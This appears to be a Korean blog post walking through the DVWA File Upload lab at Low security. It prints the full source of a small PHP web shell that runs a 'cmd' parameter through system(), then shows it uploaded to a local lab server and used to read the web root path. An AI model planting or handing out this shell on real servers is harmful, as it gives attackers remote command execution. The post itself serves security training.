본문 바로가기
해킹/DVWA

DVWA 실습 5. File Upload (Low)

by yenua 2022. 5. 19.
반응형
Objective
Execute any PHP function of your choosing on the target system (such as phpinfo() or system()) thanks to this file upload vulnerability.

파일업로드 취약점을 이용해 php 함수들을 실행해보는 것이 목적이다.

 

업로드할 php 파일의 코드는 아래와 같다.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
    phpinfo()
?>
</pre>
</body>
</html>

low 레벨이라 그런지 바로 업로드가 된다.

http://192.168.0.101/hackable/uploads/test.php 로 접속해보면

올라간 웹쉘과 phpinfo 화면이 보인다.

cd를 입력했을 때, 웹 루트 디렉토리 경로까지 보이는 것을 확인할 수 있었다.

반응형